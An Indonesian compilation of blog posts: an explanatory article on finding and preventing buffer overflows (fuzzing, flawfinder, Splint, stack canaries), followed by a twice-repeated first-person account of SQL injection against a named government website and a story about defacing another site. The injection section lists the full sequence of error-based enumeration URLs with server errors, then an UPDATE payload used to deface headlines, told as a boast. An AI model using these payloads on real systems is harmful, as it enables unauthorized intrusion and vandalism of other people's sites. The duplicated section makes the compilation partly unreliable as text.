Buffer overflow adalah satu titik lemah yang sering ada. Tidak ada satu software pun, cepat atau lambat tidak dihampiri oleh titik lemah buffer overflow. Pasal’a, satu penyebab buffer overflow adalah prinsip aktifitas dari setiap software, yakni hasil salinan data yang dikirim oleh user dari suatu tempat ke tempat lainnya. Jika developer suatu program menguji semua data sebelum disalin, maka bisa jadi buffer overflow masuk ke dalam library yang digunakan oleh program tersebut.

Buffer overflow bisa disalahgunakan dengan dua alasan. Selain program yang berhubungan atau keseluruhan system ditabrakkan, satu Denial of Service dikeluarkan atau satu Code tranfer diimplementasikan. Untuk suatu penyerangan, implementasi Code lebih hebat lagi, dimana selanjutnya satu Denial of Service bisa dikeluarkan sewaktu-waktu. Yang sangat menarik adalah, buffer overflow dalam program, yang berjalan dengan privilegies tinggi, yakni Root pada Unix/Linux Systems dan Administrator pada Windows Systems. Namun hak bagi user normal juga penting, karena berasal dari sana lah titik lemah selanjut’a bisa disalahgunakan untuk mendapatkan privilegies tinggi dengan lebih mudah lagi.

Contoh sangat berbahaya, buffer overflow dalam program yang bisa diakses melalui network, seperti servers atau TCP/IP stack. Di sini ada satu contoh titik lemah yang ditemukan pada bulan April dalam Mailserver MailEnable. Melalui satu header yang dasar’a telah disiapkan, satu buffer overflow dimunculkan dan selanjut’a Code diimplementasikan juga. Sebuah program yang menyalahgunakan titik lemah ini (satu yang dikenal sebagai Exploit), telah dipublikasikan dalam Internet. Alhasil, satu “pintu belakang” ditutup, dan melalui pintu tersebut itulah aggressor bisa mengambil alih kontrol melalui komputer yang terhubung.

Bagi para aggressor, titik lemah tersebut mempunyai dua keuntungan, yakni mereka bisa menyelewengkan’a, dan tidak bergantung pada aksi user manapun. Lalu, mereka bisa menentukan komputer mana yang ingin diserang. Pada titik lemah yang digambarkan di bawah, seorang aggressor paling tidak memilih user tertentu, yang dikirimi’a satu email yang dipersiapkan untuk penyalahgunaan suatu titik lemah tersebut. Ia tidak mengetahui, di komputer yang mana email tersebut dibaca.

Kategori lain’a adalah buffer overflow dalam library. Ini yang disalahgunakan, dimana data yang telah siap dikeluarkan oleh suatu program, supaya bisa memanggil function yang berhubungan dengan library. Contoh tertentu dari kategori ini, yaitu titik lemah dalam Microsoft JPEG processing dalam GDI+. Titik lemah yang muncul pada September 2004 ini bisa disalahgunakan melalui satu foto JPEG yang telah disiapkan, untuk menjalankan code tertentu. Untuk itu, foto tertentu harus’a hanya dibuka dalam satu aplikasi, yang menggunakan library yang berhubungan. Pembacaan email atau website, yang berisi foto tersebut, telah cukup. Sesaat setelah publikasi titik lemah melalui Microsoft, muncullah gambar pertama di Internet, yang menyalahgunakan titik lemah tersebut, untuk menginstal satu trojaner dan juga membuka “pintu belakang”.

Bahaya tertentu pada titik lemah dalam libraries terdiri dari satu sistem yang telah di-patch menjadi sensitif, jika satu program pada installation’a menukar koreksi library melalui satu versi lama yang sensitif dan selanjut’a menginstall’a. Biasa’a user juga tidak mengetahui, apakah satu program tertentu menggunakan satu library sensitif dan functions yang berhubungan. Selanjut’a bahaya akibat titik lamah ini sulit ditentukan oleh user itu sendiri.

Buffer overflow dalam program aplikasi biasa’a disalahgunakan melalui file yang telah disiapkan. Satu actual provider pada kategori ini adalah satu titik lemah dalam Word. Satu dokumen yang telah disiapkan, menggiring ke satu buffer overflow, dan melalui’a code transfer disediakan. File semacam bisa dikirim misal’a melalui email atau ditawarkan untuk bisa didownload pada satu website. Code transfer diimplementasikan dengan seijin user. Jika ini bekerja sesuai ijin administrator, maka aggressor mendapatkan kontrol penuh mengenai komputer yang berhubungan.

Titik Lemah Search Dalam Binaries

Fault Injection
Pada Fault Injection, program yang diteliti dipanggil dengan parameter yang ekstrim dan tidak biasa’a dan/atau ditempati oleh variabel environment pada value yang ada. Jika program itu berisi satu titik lemah buffer overflow, akan muncul reaksi tak terbayangkan pada input-nya, umum’a berupa satu crash. Namun, sebalik’a jika program berjalan lagi secara normal, maka tidak akan ditemukan buffer overflow yang bisa dimanfaatkan melalui parameter yang telah disebutkan, atau bisa juga diakibatkan parameter yang tersedia dahulu belum cukup besar.

Pada satu sisi, suatu program bisa dipanggil secara manual dengan parameter tertentu, dan di sisi lain’a terdapat test program spesial untuk itu. Di sini dibedakan antara host-based dan network-based programs.

Host-based programs contoh’a adalah BFBTester dan Sharefuzz. BFBTester (Brute Force Binary Tester) ternyata bisa memanipulasi parameter single dan jamak atau variabel Environment. Sharefuzz berfungsi tanpa melakukan search ke titik lemah buffer overflow pada processing variabel environment.

Network-based programs contoh’a adalah Hailstorm atau Spike. Hailstorm melakukan search titik lemah dalam web application. Selain melakukan pencarian terhadap buffer overflow, program itu juga mencari weak point Cross Site Scripting dan SQL Injection. Sedang Spike melayani penelitian protokol network dan program yang terhubung dengan’a.

Dynamic Analisys
Pada analisis dinamis, maksud’a analisis selama run time, 2 tipe program digunakan: yaitu Tracer dan Debugger.

Saru Tracer melakukan log peredaran suatu program. Protokol yang dibuat diuji coba selanjut’a pada kasus tertentu seperti buffer yang belum diuni coba. Ini juga memungkinkan perekonstruksian penggunaan dari variabel, yang kelak melakukan uji coba dengan bantuan Fault Injection sesuai tujuan’a.

Satu Debugger tidak bisa melakukan log peredaran tersebut seperti satu Tracer, namun justru manipulasi’a. Manipulasi yang mungkin terjadi tercapai dari pengalihan Instruction Pointer hingga ke perubahan variabel dan instruksi. Contoh untuk Debugger adalah Gnu Debugger gdb dan SoftICE.

Reverse Engineering
Pada Reverse Engineering, source code dikembangkan untuk satu program yang ada. Untuk itu program tersebut dirangkai atau didekompilasi. Satu program yang sering digunakan untuk itu, adalah interaktive Dissassembler IDA-Pro. Interactive dalam hal ini maksud’a adalah bahwa developer selama perangkaian memutuskan sendiri apakah data diinterpretasikan sebagai data atau code. Sebagai hasil’a, didapatkan source code Binary dalam Assembler. Di dalam’a seperti tertulis pada Sourcecode Audit, dapat dicari fungsi panggilan yang menjadi penyebab. BugScam, satu development untuk IDA Pro, juga membantu.

Satu Contoh
Satu program yang hanya tersedia secara binary diteliti untuk mengetahui ada tidaknya titik lemah buffer overflow. Contoh’a mengenai satu Editor, yang dipanggil melalui command lines dengan nama dari file yang bisa dibuka. Pertama-tama bisa dicoba dengan bantuan Fault Injection menampilkan satu reaksi yang tidak biasa, seperti:

tester edit `perl -e ‘print “A”x1024′`

Jika ada yang datang menghampiri buffer overflow, maka satu Segmentation fault segera dilaporkan. Mungkin hasil ini sudah memenuhi dan diketahui lebih banyak lagi. Jika satu nama file yang ekstrim mengarah ke satu buffer overflow, mungkin masih ada titik lemah lain’a yang serupa. Dalam kasus ini, satu penelitian seputar variabel environment sangat menarik. Namun, parameter command line lain’a adalah Test object yang sangat berguna. Untuk memudahkan pencarian, sekarang contoh’a bisa digunakan BFBTester:

tester bfbtester -a edit
*** Crash ***
args: -h [05120]
envs:
Signal: 11 ( Segmentation fault )
Core? Yes

Program tersebut terganjal pada pemanggilan dengan option -h dan satu parameter yang panjangnya 5.120 indikasi dengan satu segmenting error. Jika seseorang masih ingin mengetahui, ia bisa mencari tahu seputar peredaran program dengan satu Debugger. Juga muncul pertanyaan yang paling menarik, apakah ini mengenai serangkaian Denial of Service weak point atau apakah penampilan transferred code. Yang penting untuk ini adalah overwriting untuk peredaran program dari variabel yang penting.

Buffer Overflow Tracking

Untuk menelusuri titik lemah buffer overflow, terdapat dua kemungkinan, yakni pencarian dalam source code dan analisis binaries. Developer biasa’a memilih pencarian dalam source code, sejak tersedia untuk mereka. Namun demikian, analisis binaries bagi mereka tetaplah berarti, contoh’a jika titik lemah diumpamakan dalam libraries gabungan.

Sourcecode Audit

Pada prinsip’a, di sini source code diteliti tahap demi tahap berdasarkan posisi code yang mencurigakan. Jika yang dicari hanya titik lemah buffer overflow’a, maka baru besaran pasti dari semua buffer overflow yang diteliti, lalu beringsut pada proses lanjutan lain’a. Pencarian manual ini tentu saja adalah metode yang tergolong rumit, namun terbilang yang paling aman.

Untuk automatic tools, terhadap dua tahap yang harus dilakukan, yakni analisis syntaktis atau leksikalis dan semantis. Pada analisis syntaktis, dicari berdasarkan fungsi berbahaya yang potensial, selama aliran data pada analisis semantis dianalisis.

Analisis Syntaktis

Sarana pendukung yang paling sederhana untuk pencarian berdasarkan panggilan function berbahaya adalah search function dari editor dan grep Tool yang digunakan. Karena developer harus mencari berdasarkan setiap function’a satu persatu, maka penggunaan untuk analisis syntaktis, tidak bisa dianggap gampang. Hal ini sangat tepat untuk program² spesial, seperti flawfinder untuk C dan C++ serta RATS untuk C, C++, Perl, PHP dan Python. Kedua’a menggunakan satu database dengan fungsi yang berpotensi berbahaya dan titik lemah yang ditemukan, yaitu petunjuk untuk efek dan bantuan yang memungkinkan.
Contoh:

Test-Programm test.c

#include

int main (int argc, char *argv[])
{
char puffer[8];
if (argc > 1)
strcpy (puffer, argv[1]);
return 0;
}

Tampilan flawfinder

ceilers flawfinder test.c
Flawfinder version 1.26, (C) 2001-2004 David A. Wheeler.
Number of dangerous functions in C/C++ ruleset: 158
Examining test.c
test.c:6: [4] (buffer) strcpy:
Does not check for buffer overflows when copying to destination.
Consider using strncpy or strlcpy (warning, strncpy is easily misused).
test.c:4: [2] (buffer) char:
Statically-sized arrays can be overflowed. Perform bounds checking,
use functions that limit length, or ensure that the size is larger than
the maximum possible length.

Hits = 2
[...]
Not every hit is necessarily a security vulnerability.
There may be other security vulnerabilities; review your code!

Sejak dari analisis syntaktis, semua panggilan function juga ditampilkan, dimana sebelum’a parameter diuji coba hanya jika ada banyak peringatan kesalahan.

Analisis Semantis

Pada analisis semantis, aliran data dianalisis. Ini merupakan bagian dari compiling procedure. gcc-Compiler menampilkan, contohnya pada indikasi option -Wall, dan juga warning pada penggunaan functions yang tidak pasti. Namun ada juga program tersendiri untuk analisis semantis. Satu contoh untuk tool semacam itu adalah Splint. Splint menguji, apakah hipotesis tertentu yang dispesifikasikan sebagai “annotations” dalam source code, mengena. Annotations untuk function strcpy(s1, s2) terlihat contoh’a seperti berikut ini:

void /*@alt char * @*/ strncpy
(/*@unique@*/ /*@out@*/ /*@returned@*/ char *s1, char *s2, size_t n)
/*@modifies *s1@*/
/*@requires maxSet(s1) >= ( n – 1 ); @*/
/*@ensures maxRead (s2) >= maxRead(s1) /\ maxRead (s1) <= n;@*/;

Klausal requires menuntut, bahwa buffer yang diberikan sebagai s1 haruslah cukup besar, untuk merekord s2. Dalam Klausal ensure sudah pasti jumlah tanda terbaca dari s1 dan s2 harus sama besar berdasarkan panggilan’a. Pada kasus-kasus yang di dalam’a besaran s2 tidak dikenali, function strncpy(s1, s2, n) digunakan. Annotations’a terlihat sebagai berikut:

void /*@alt char * @*/ strncpy
(/*@unique@*/ /*@out@*/ /*@returned@*/ char *s1, char *s2, size_t n)
/*@modifies *s1@*/
/*@requires maxSet(s1) >= ( n – 1 ); @*/
/*@ensures maxRead (s2) >= maxRead(s1) /\ maxRead (s1) <= n;@*/;

Klausal requires menuntut, bahwa buffer yang diberikan sebagai s1 harus’a cukuplah besar, untuk merekam jumlah copying indication. Klausal ensure menetapkan, bahwa tanda nn disalin dari s1 ke s2. Metode untuk analisis source code mencukupi pada sebagian besar kasus untuk menemukan titik lemah. Jika source code tidak tersedia, maka hanya analisis binaries-lah yang akan membantu.

Buffer Overflow Defense

Pada umum’a, mengubah dasar system sehingga bisa melindungi aplikasi dari masalah- masalah keamanan yang rentan adalah ide yang paling bagus. Beberapa dari ukuran keamanan yang popular dapat dikelompokkan kedalam kategori seperti dibawah ini:

* Canary-based defenses. Yaitu meliputi Stack Guard (seperti yang digunakan oleh Immunix), ssp/ProPolice (digunakan oleh OpenBSD), dan Microsoft’s /GS option.

* Non-executing stack defenses. Yaitu meliputi Solar Designer’s non-exec stack patch (yang digunakan oleh OpenWall) dan exec shield (digunakan oleh RedHat/Fedora).

* Pendekatan lain’a. Yaitu meliputi libsafe (yang digunakan mandrake) dan pendekatan split-stack.

Sayang’a, semua pendekatan yang telah dilakukan selama ini masih mempunyai kelemahan, sehingga tidak ada “obat mujarab” untuk menangani buffer overflow, tapi pendekatan- pendekatan diatas sudah dapat sangat membantu.


SQL Injection Dan Contoh Study Kasus

SQl Injection adalah proses dimana seorang attacker melakukan input query SQL sehingga attacker dapat mengakses, serta melakukan perubahan pada database hingga menghapus database yg menggunakan SQL, dan disini gw akan melakukan study kasus methode SQL Injection pada situs Badan Pengawas Obat dan Makanan yg memiliki bug sql injection

situs ini beralamat di www.pom.go.id

langkah pertama setelah masuk ke dalam situs www.pom.go.id, gw mencoba melakukan enumeration pada www.pom.go.id untuk mempelajari situs tersebut, setelah loncat kesana kesini me-lihat² situs www.pom.go.id akhir’a gw singgah ke dalam page berita berikut URL yg di dapat:

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203
berikut’a gw mencoba untuk melakukan penetration dengan menambahkan parameter having 1=1– pada URL di belakang id=203 pada situs ini untuk mencari halaman error dan berharap mendapatkan informasi yg menarik

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

Yeah !! keluar nama field pertama yaitu t_News.id, dengan rasa tertarik yg semakin besar akhir’a gw coba untuk meneruskan’a, berikut’a gw mencoba mencari nama² field berikut’a dan table² lain’a dengan menggunakan perintah group by t_News.id having 1=1–

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.d_News’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

Yippie !! dapat lagi nama field kedua yaitu t_News.d_News, 0.k lanjut terus hingga mendapatkan field terakhir

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.Kateg’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.SubKateg’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.HeadLineInd’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg,
t_News.HeadLineInd+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.HeadLineEng’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg,
t_News.HeadLineInd,t_News.HeadLineEng+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.NewsInd’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg,
t_News.HeadLineInd,t_News.HeadLineEng,t_News.NewsInd+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.NewsEng’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg,
t_News.HeadLineInd,t_News.HeadLineEng,t_News.NewsInd,t_News.NewsEng+
having+1=1–
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.Reporter’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg,
t_News.HeadLineInd,t_News.HeadLineEng,t_News.NewsInd,t_News.NewsEng,
t_News.Reporter+having+1=1–

pada penginputan ini, page error tidak keluar lagi, yg ada gw di bawa pada page berita normal seperti biasa…hmmm berarti bisa gw simpulkan bahwa pada kategori berita terdapat 9 column saja, berikut column² yg sudah gw dapat:

t_News.id
t_News.d_News
t_News.Kateg
t_News.SubKateg
t_News.HeadLineInd
t_News.HeadLineEng
t_News.NewsInd
t_News.NewsEng
t_News.Reporter

Finally…!!!
setelah mendapatkan semua nama field dan table’a sekarang saat’a gw melakukan update pada situs www.pom.go.id atau dengan kata lain gw melakukan Deface dengan menggunakan perintah update t_News set HeadLineInd=’HackeD by v3n0m Dedicated for mY sWeetHeart sarah octora dan juga pakar IT palsu’;–

atau lebih jelas’a sebagai berikut
http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+update+
t_News+set+HeadLineInd=’HackeD+by+v3n0m+Dedicated+for+mY+
sWeetHeart+sarah+octora+dan+juga+pakar+IT+palsu’;–


sebenar’a ada beberapa field lagi selain field² di atas yg gw dapatkan dari masing² kategori pada situs tersebut, dan ini adalah beberapa field yg sudah gw dapat

t_Press_Release.id
t_Press_Release.kateg
t_Press_Release.subkateg
t_Press_Release.headlineInd
t_Press_Release.pressInd
t_Press_Release.headlineEng
t_Press_Release.pressEng
t_Press_Release.d_press
t_Press_Release.reporter

t_kateg.kateg
t_kateg.DeskInd
t_kateg.DeskEng
t_kateg.menuFlag

dan hanya 2 kategori saja yg field’a gw ubah, yaitu kategori News dan kategori Press Release.

Inti dari semua ini sebenar’a gw cuma merasa kesal aja dengan seorang yg mengaku pakar tapi sok tau, dengan berbekal analisa photo saja dia sudah di bilang pakar telematika, hayaahhh, analisa photo sey ga perlu pake skill yg tinggi kale, para programmer² dan hacker² handal saja ga pernah menyebut diri mereka pakar, situ ga malu yach
hihihihi….


Source :Venom's Blog


SQL Injection Dan Contoh Study Kasus

SQl Injection adalah proses dimana seorang attacker melakukan input query SQL sehingga attacker dapat mengakses, serta melakukan perubahan pada database hingga menghapus database yg menggunakan SQL, dan disini gw akan melakukan study kasus methode SQL Injection pada situs Badan Pengawas Obat dan Makanan yg memiliki bug sql injection

situs ini beralamat di www.pom.go.id

langkah pertama setelah masuk ke dalam situs www.pom.go.id, gw mencoba melakukan enumeration pada www.pom.go.id untuk mempelajari situs tersebut, setelah loncat kesana kesini me-lihat² situs www.pom.go.id akhir’a gw singgah ke dalam page berita berikut URL yg di dapat:

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203
berikut’a gw mencoba untuk melakukan penetration dengan menambahkan parameter having 1=1– pada URL di belakang id=203 pada situs ini untuk mencari halaman error dan berharap mendapatkan informasi yg menarik

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

Yeah !! keluar nama field pertama yaitu t_News.id, dengan rasa tertarik yg semakin besar akhir’a gw coba untuk meneruskan’a, berikut’a gw mencoba mencari nama² field berikut’a dan table² lain’a dengan menggunakan perintah group by t_News.id having 1=1–

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.d_News’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

Yippie !! dapat lagi nama field kedua yaitu t_News.d_News, 0.k lanjut terus hingga mendapatkan field terakhir

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.Kateg’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.SubKateg’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.HeadLineInd’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg,
t_News.HeadLineInd+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.HeadLineEng’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg,
t_News.HeadLineInd,t_News.HeadLineEng+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.NewsInd’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg,
t_News.HeadLineInd,t_News.HeadLineEng,t_News.NewsInd+having+1=1–
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.NewsEng’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg,
t_News.HeadLineInd,t_News.HeadLineEng,t_News.NewsInd,t_News.NewsEng+
having+1=1–
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘t_News.Reporter’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/public/berita_aktual/detail.asp, line 149

http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+group+by+
t_News.id,t_News.d_News,t_News.Kateg,t_News.SubKateg,
t_News.HeadLineInd,t_News.HeadLineEng,t_News.NewsInd,t_News.NewsEng,
t_News.Reporter+having+1=1–

pada penginputan ini, page error tidak keluar lagi, yg ada gw di bawa pada page berita normal seperti biasa…hmmm berarti bisa gw simpulkan bahwa pada kategori berita terdapat 9 column saja, berikut column² yg sudah gw dapat:

t_News.id
t_News.d_News
t_News.Kateg
t_News.SubKateg
t_News.HeadLineInd
t_News.HeadLineEng
t_News.NewsInd
t_News.NewsEng
t_News.Reporter

Finally…!!!
setelah mendapatkan semua nama field dan table’a sekarang saat’a gw melakukan update pada situs www.pom.go.id atau dengan kata lain gw melakukan Deface dengan menggunakan perintah update t_News set HeadLineInd=’HackeD by v3n0m Dedicated for mY sWeetHeart sarah octora dan juga pakar IT palsu’;–

atau lebih jelas’a sebagai berikut
http://www.pom.go.id/public/berita_aktual/detail.asp?id=203+update+
t_News+set+HeadLineInd=’HackeD+by+v3n0m+Dedicated+for+mY+
sWeetHeart+sarah+octora+dan+juga+pakar+IT+palsu’;–


sebenar’a ada beberapa field lagi selain field² di atas yg gw dapatkan dari masing² kategori pada situs tersebut, dan ini adalah beberapa field yg sudah gw dapat

t_Press_Release.id
t_Press_Release.kateg
t_Press_Release.subkateg
t_Press_Release.headlineInd
t_Press_Release.pressInd
t_Press_Release.headlineEng
t_Press_Release.pressEng
t_Press_Release.d_press
t_Press_Release.reporter

t_kateg.kateg
t_kateg.DeskInd
t_kateg.DeskEng
t_kateg.menuFlag

dan hanya 2 kategori saja yg field’a gw ubah, yaitu kategori News dan kategori Press Release.

Inti dari semua ini sebenar’a gw cuma merasa kesal aja dengan seorang yg mengaku pakar tapi sok tau, dengan berbekal analisa photo saja dia sudah di bilang pakar telematika, hayaahhh, analisa photo sey ga perlu pake skill yg tinggi kale, para programmer² dan hacker² handal saja ga pernah menyebut diri mereka pakar, situ ga malu yach
hihihihi….


Source :Venom's Blog


Tragedi situs www.tembang.com

Siang itu waktu lagi di kampus, gw masih terus kepikiran tentang sarah, dan gw inget banget saat² di kosan’a dia dan ga nyangka klo ternyata itu buat terakhir kali’a gw bakal ngeliat dia hikz, inget banget sore itu di kosan dia, dia nyanyi lagu paramitha rusady yg judul’a penglihatan, klo ga salah tuch lagu soundtrack’a sinetron taon 90an dey, eh iya² gw masih inget tuch !! di dalem kelas gw malah ga merhatiin dosen yg lagi cuap² di depan gw, yg ada malahan gw mikirin planing nanti pulang kuliah di warnet download klo ga nyari tau lagi ah tentang lagu itu, duhhh parah bener sey gw kuliah

ya udahlah begitu jam mata kuliah abis, gw langsung cabut dari kampus ga pake nongkrong dolo kya biasa’a, di perjalanan menuju warnet gw terus mikirin dork² yg pas buat nyari tuch lagu di google.

begitu nyampe warnet langsung aja ga pake lama lagi langsung googling, dan alhasil gw menuju beberapa situs, dari www.youtube.com, www.multiply.com, www.tembang.com, pertama di youtube gw dapet videoclip’a, lucu juga sey klo di liat² lagi, abis jadul sey, ahkz tapi yg gw mau bukan clip’a tuch lagu, gw mau tuch lagu dalam format mp3, well tanpa banyak cincay youtube pun akhir’a gw blokir, eh..eh..salah, maaf maksud gw youtube’a gw close aja gitu, mana mungkin sey gw bisa ngeblokir youtube, gw kan bukan pakar telematika -Nyindir dikiT moDe [ON]-

di tembang.com pun begitu gw search dengan kata paramitha rusady – penglihatan, gw cuma ngedapetin lyric’a aja, loch? trus lagu’a? KAGA DAPET DUL… huft, berarti harapan gw tinggal di multiply doank ney, ya udah dey gw close aja temba… eits !! ntar dolo !!

ga tau kenapa begitu mouse gw arahin ke tombol close di pojok kanan atas browser, mata gw sedikit nakal men-curi² pandang url’a situs tembang.com gitu dey, gw perhatiin ternyata tembang.com menggunakan asp dengan methode get, hmmm… klo gitu masih ada kesempatan ney buat gw injeksi query sql lewat url, akhir’a ga jadi dey niat gw buat ngeclose tuch situs.

niat gw sey cuma mo penetration tester doank, tapi begitu gw inject pk metode sql injection, eh ternyata keluar nama column pertama dari error page yg gw dapet, jujur aja sebener’a gw gada niat nge-hack siang itu bahkan minggu² ini gw gada niat buat nge-hack situs, jangankan hacking, dari browsing, chating, kuliah, bahkan sampai makan aja gw males, yach… ini semua gara² sarah, loch² !! ko jadi sarah yg di salahin sey ?!! bukan, bukan gitu maksud gw, tapi gw kehilangan semangat gw ketika sarah pergi ninggalin gw buat selama’a, gw bener² ga mampu meredam rasa kehilangan gw ke dia, maka’a itu gw langsung down udah kya di Ddos sama ribuan komputer dari seluruh penjuru dunia.

stop² !! lupakan sejenak tentang sarah, yg ada gw malah makin down, 0.k kita lanjut ke tembang.com lagi, nah setelah gw penetration tester ke situs tembang.com ternyata keluar semua nama column’a, yaAaaAa klo udah begini trus mo gimana lagi dunk, masa di diemin gitu aja, biarpun semangat lagi gada, tapi hasrat gw mengatakan “udah hajar aja, nanggung tuch” w0keh dey deface !!

lusa setelah gw abis ngedeface situs tembang.com, iseng² gw nyalain YM dan ga berapa lama temen gw langsung private messege ke gw, yg kata²a dia masih gw inget jelas

F: cie² yg masuk okezone, makin terkenal aja ney
G: apaan sey lo nyet ga jelas
F: lo abis mbobol situs tembang.com ye?
G: lah ko lo tau?
F: iya gw tau dari okezone
G: Hah ?? okezone?? mana coba liat link’a
F: nih http://techno.okezone.com/index.php/ReadStory/2008/04/28/55/104669/situs-tembang-com-dijebol-cracker
G: wew !!

